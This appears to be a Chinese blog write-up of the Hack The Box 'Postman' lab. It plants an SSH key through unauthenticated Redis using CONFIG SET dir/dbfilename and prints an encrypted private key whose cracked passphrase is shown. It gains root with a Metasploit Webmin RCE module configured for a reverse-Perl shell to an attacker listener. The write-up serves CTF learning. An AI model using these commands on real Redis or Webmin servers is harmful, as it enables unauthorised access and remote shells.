Postman(Redis未授权访问漏洞)

最新推荐文章于 2024-07-28 17:19:49 发布
最新推荐文章于 2024-07-28 17:19:49 发布
阅读量4k 收藏
点赞数
分类专栏: hack the box 文章标签: 渗透测试 网络安全 hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/121642343
版权

Postman

信息收集

发现目标开放了22、80、6379等常见端口

root💀kali)-[~/Desktop/Scan-Scripts]
└─# ./nmap.sh 10.10.10.160
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:32 EST
Nmap scan report for 10.10.10.160
Host is up (0.30s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.85 seconds

我们访问一下web服务,发现只是一个普通的web页面而已在这里插入图片描述
我们模糊一下网站路径

┌──(root💀kali)-[~/Desktop/Scan-Scripts]
└─# dirsearch -u "http://10.10.10.160" -e * -x404,403,500

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )                                                                                                                        
                                                                                                                                               
Extensions: nmap.sh | HTTP method: GET | Threads: 30 | Wordlist size: 8979

Output File: /root/.dirsearch/reports/10.10.10.160/_21-11-30_07-47-35.txt

Error Log: /root/.dirsearch/logs/errors-21-11-30_07-47-35.log

Target: http://10.10.10.160/
                                                                                                                                               
[07:47:35] Starting: 
[07:48:35] 301 -  310B  - /css  ->  http://10.10.10.160/css/                                                                             
[07:48:44] 301 -  312B  - /fonts  ->  http://10.10.10.160/fonts/                                                             
[07:48:48] 301 -  313B  - /images  ->  http://10.10.10.160/images/                        
[07:48:48] 200 -    2KB - /images/
[07:48:50] 200 -    4KB - /index.html                                                                                                 
[07:48:51] 200 -    3KB - /js/                                                                                                              
[07:48:52] 301 -  309B  - /js  ->  http://10.10.10.160/js/                   
[07:49:25] 301 -  313B  - /upload  ->  http://10.10.10.160/upload/                                                                       
[07:49:27] 200 -    8KB - /upload/                                                                          
                                                                                                                       
Task Completed

我们发现一个upload目录,访问发现只有一些图片而已
在这里插入图片描述
web攻击无果,那我们将注意力转移到redis数据库上,尝试是否存在未授权访问漏洞
在这里插入图片描述

漏洞利用

我们首先将我们的ssh-key写入到key.txt文件中
在这里插入图片描述
再把key.txt文件内容写入redis缓存中
在这里插入图片描述

10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"
10.10.10.160:6379> config set /var/lib/redis/.ssh
(error) ERR Wrong number of arguments for CONFIG set
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> exit

我们尝试登录到该主机上
在这里插入图片描述
我们上传linpeas.sh脚本到目标主机上发现,主机的/opt目录上存在一份私钥备份

redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

我们将其下载到本机,并使用ssh2john.py将其哈希导出
在这里插入图片描述
然后使用john进行破解得到密码,得到密码computer2008,登录到Matt账户
在这里插入图片描述

提权root

我们访问10000端口发现是个webmin应用程序,在EDB发现存在RCE漏洞并在MSF中集成
在这里插入图片描述
在这里插入图片描述
我们直接使用第二个并填写好参数后,得到root权限

msf6 > use 2
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf6 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160
rhosts => 10.10.10.160
msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf6 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost 10.10.14.9
lhost => 10.10.14.9
msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > exploit

在这里插入图片描述

平凡的学者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Go语言开发Web应用实战——这本书介绍了如何用Golang开发Web应用,涵盖从基础概念到实践应用等内容
程序员光剑
07-29 1245
2019年是第四个十年科技革命的开端,也是Golang被广泛应用的一个年份。这几年,Golang的热度不断提升,在开源社区及企业内部也出现了一批拥抱Go的优秀人员。每当我听到有人宣传“Golang开发更快、更安全、更高效”,或者推荐“Go语言入门”时,都会觉得不可思议。Golang作为新一代的编程语言,非常适合用来开发复杂的分布式系统,但同时它也非常简单易懂,可以轻松地学习掌握。在本书中,你将从零开始构建一个完整的基于Golang+Vue.js+MySQL Web应用程序。
系统性能与可靠性分析的思考——系统性能篇
程序员光剑
08-07 734
随着互联网产品、服务、平台等日益壮大的业务规模和复杂程度,越来越多的公司面临系统性能与可用性挑战。为了保障系统高效运行,提升用户体验及系统稳定性,企业应当进行全方位的性能监控,保证其在运行过程中始终保持高质量的服务水平。1)系统性能简介:什么是系统性能?如何衡量系统性能?2)系统性能瓶颈分析:系统存在哪些性能瓶颈?如何通过工具来识别和定位系统性能瓶颈?3)系统性能优化方法论:系统性能优化主要关注哪些方面?如何进行系统性能优化?4)系统性能调优实践:如何才能做到快速准确地定位并解决系统性能瓶颈?
RedisGitPostman安装包
07-04
包含了Redis安装包、Git安装包、Postman安装包,开发工具共享
postman测试接口使用redis报错Unable to connect to Redis; nested exception is org
guoyanan_的博客
08-29 5936
有些小问题明明很简单,但是由于之前没有碰到过,出了问题也只好网上查询,其实别人说的方式已经都是对的,但是自己尝试了之后还是没有解决问题,怎么说呢,事无巨细,把核心问题给说了,但是有的是需要搭建环境的,可能大佬们看来这已经无需再提,但是也是有一些没经历过的同学们难免不能全部考虑到,下面就把这个我碰到的问题经过和处理心得给大家说一下,本来五分钟解决的问题,因为没考虑周全,尝试了半天才知道原来败给了一个小小的基本点。二、找到redis的配置文件(我用的是windows系统)找到redis的安装目录,就是如下图。.
保护API测试数据:Postman中的敏感信息安全策略
最新发布
2401_85812053的博客
07-28 627
然而,随着敏感数据的频繁交换,如何保护这些信息成为了一个重要议题。Postman,作为一款流行的API开发工具,提供了多种方法来确保测试数据的安全性。本文将深入探讨Postman中保护敏感信息的最佳实践,并提供实用的代码示例。保护API测试中的敏感信息是一个持续的过程,需要结合技术手段和管理措施。通过上述方法,可以在Postman中有效地保护敏感数据,确保API测试的安全性和可靠性。这是保护敏感信息的一种有效方式。对团队成员进行教育和培训,让他们了解保护敏感信息的重要性,并熟悉Postman的安全功能。
开发避坑3——大鸟 pk Bug(使用postman测试POST接口遇到报错(ErrorMessage:Unauthorization request ......))
weixin_45657411的博客
09-24 2725
使用postman测试POST接口遇到报错(ErrorMessage:Unauthorization request ......)
【Spring Security】Postman调用时无授权与CSRF验证
锥栗的博客
05-16 1838
Spring Security 是一个强大的、高度可定制的 Java 安全框架,它为基于 Spring 的应用程序提供了全面的安全服务和解决方案。
com.bstek.ureport.console.exception.ReportDesignException: Report data has expired,can not do previe
abc13011921889的博客
01-02 7692
在ureport点击预览时出现下面错误 com.bstek.ureport.console.exception.ReportDesignException: Report data has expired,can not do preview. at com.bstek.ureport.console.html.HtmlPreviewServletAction.loadReport(HtmlPre...
redis授权访问漏洞
SatanRiver的博客
08-15 453
一、了解漏洞 1、什么是redisredis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的api。 2.redis 授权访问是什么漏洞redis是默认绑定在0.0.0.0:6379,并且没有开启认证,如果没有采取相关的一些策略,比如添加防火墙规则避免其他非信任来源的ip访问等,将会导致redis服务直接暴露在公网,...
Redis授权访问漏洞
05-02 471
Redis授权访问漏洞 目录 Redis授权访问漏洞 漏洞存在的条件 SSH登陆 复现 最后 漏洞存在的条件 1.redis绑定0.0.0.0:6379 2.redis设置访问密码 SSH登陆 SSH提供两种登录验证方式,一种是口令验证也就是账号密码登录,另一种是密钥验证也就是我们想要的免密登录了。 密码的认证,使用公钥加密、私钥解密,其中公钥是可以公开的,放在...
HTB靶机-Postman Write Up
weixin_43815032的博客
12-27 1092
0x00 引子 某日在安全客上刷到了这个文章《我是如何拿到OSCP认证的?》,读完之后感觉太TM励志了,教练我也考OSCP,说干就干,于是随手搜索了一些备战OSCP的分享,看了一些准备知识,先从靶场练起。 0x01 准备工作 ...
第7章 Spring Security 的 REST API 与微服务安全(2024 最新版)
江帅帅
03-02 1141
文章目录7.1 保护 REST API7.1.1 基础知识详解7.1.2 重点案例:使用 JWT 进行身份验证和授权案例 Demo7.1.3 拓展案例 1:API 密钥认证案例 Demo测试API密钥认证7.1.4 拓展案例 2:使用 OAuth2 保护 API案例 Demo测试 OAuth2 保护的 API7.2 微服务安全最佳实践7.2.1 基础知识详解7.2.2 重点案例:使用 JWT 实现服务间认证案例 Demo7.2.3 拓展案例 1:使用 Spring Cloud Security 简化安全配
postman rpc本地调用_尝试进行RPC漏洞挖掘
weixin_39627751的博客
10-28 352
0x00 摘要2018年8月27日名为sandboxescaper的网友上传了一份win10本地提权的0day利用代码(后被微软修复并分配CVE编号CVE-2018-8440),我通过对历史漏洞进行研究,对Windows系统中RPC(Remote Procedure Call,远程过程调用)漏洞挖掘进行了简单的探索,和大家分享一下探索的过程。理解这种攻击的工作方式将极大地帮助其他研究人员发现类似于...
使用postman请求接口遇到401请求授权的解决办法
热门推荐
weixin_45230325的博客
06-30 1万+
解决办法:把你的前端项目启动,随便找一个接口,让后从Headers中找到Blade-Auth: 然后在postman中的Headers中把Blade-Auth添加进去,把后面的内容也拷进去。 问题解决了!可以访问了。
【开发心得】使用Postman测试需要权限验证的接口。
清风唱诗人的博客
05-06 4578
前沿,后端集成了shiro框架,除anon外的接口,至少需要登录后才能访问,那么问题来了,postman怎么测试这种情况呢。 1.打开浏览器控制台(F12),切换到network,然后操作登录,如果前端小伙伴还没完成登录页面,可以先借助swagger登录。 2.找到request header 找到 Content-Type: application/json;charset=UTF-8 ...
Redis】(一)SpringBoot 整合Redis缓存并使用Postman+JMeter进行性能测试
云祁QI
11-21 2134
文章目录1、SpringbootPostman测试分页的接口JMeter压力测试1、设置线程组2、设置测试 HTTP请求3、设置测试随机数4、测试结果 1、Springboot 在XshellDocker上使用命令,进入Redis [root@zj ~]# docker start redis redis [root@zj ~]# docker exec -it redis /bin/bash r...
从安装Redis练习常规姿势 到HTB实战 postman userflag
weixin_46128614的博客
01-13 612
实验环境 centOS:192.168.49.16 Kali:192.168.49.129 安装 安装过程参考https://blog.csdn.net/buyueliuying/article/details/82316517 centOS7: wget http://download.redis.io/releases/redis-4.0.11.tar.gz tar -xavf redis-4...
使用Postman并发测试接口&关于RedisTemplate线程安全的一些理解
weixin_42032770的博客
08-30 5360
postman并发测试接口,以及redisTemplate线程安全的理解
Postman请求错误与Redis管理解决方案
本文将探讨在测试过程中遇到的一些常见问题,特别是与RedisPostman相关的测试挑战。首先,我们关注Postman请求报错的情况。当Postman请求无响应时,通常需要检查代码日志以获取更具体的错误信息。在描述中提到的两...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值